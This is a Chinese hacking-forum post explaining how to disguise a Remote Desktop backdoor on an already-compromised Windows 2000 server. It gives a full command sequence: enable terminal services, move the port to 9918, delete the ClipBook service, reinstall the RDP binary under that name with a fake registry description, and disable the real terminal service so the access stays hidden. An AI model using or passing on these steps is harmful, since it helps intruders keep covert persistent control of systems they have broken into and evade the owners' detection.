修改后门经验谈

修改后门经验谈


作者:dkollf 来自:http://bbs.pysky.net

不知道大家装自己的后门的时候是怎么修改服务的，我记得曾经有人说过，起服务名是一件需要艺术+技术的事，一个很垃圾的后门会因为你起的服务名而长久存活，而一个很好的后门会因为你的垃圾服务名而立马挂掉。
废话不说了，就以我自己安装终端服务为例来讲讲改服务的好处吧。
这里我们要用到几个工具，先介绍一下：
3389.exe 这个不说了吧，地球人都知道
tport.exe 这个也应该知道，但是说一下，这个是改3389端口的
serv.exe 服务管理程序，可以安装、删除、修改服务
dtreg.exe CMD下的一个注册表工具，和regedit差不多。

开始，假设我们已经控制了机器，是2kserver的，终端服务还没开，让我们来开吧
3389.exe 1 #安装终端，不重起
tport.exe 9918 #修改端口
net stop ClipSrv #-----------------|删除次要服务
serv.exe remove ClipSrv /y #-----------|为修改服务做准备
copy termsrv.exe clipsvr.exe #将终端的文件拷贝成和要取代的服务比较接近的名字
serv.exe install ClipSrv /b:"%windir%/system32/clipsvr.exe" /n:"ClipBook" /i:yes /u:LocalSystem /s:auto #安装成刚才删除的服务
dtreg.exe -Quiet -Set REG_SZ /HKLM/SYSTEM/CurrentControlSet/Services/ClipBook/Description=支持"剪贴簿查看器"，以便可以从远程剪贴簿查阅剪贴页面。#修改注册表
serv modify termservice /s:disabled #修改原先终端服务的状态

现在重起一次，你会发现终端服务已经开启，端口为9918,打开服务管理器你会发现终端服务已经禁用了,进程里也没有termsrv.exe这个进程,相对来说这个已经很安全了，我一直也是用这中方式开终端，不知道其他人是不是这样干的,大家可以交流一下，呵呵.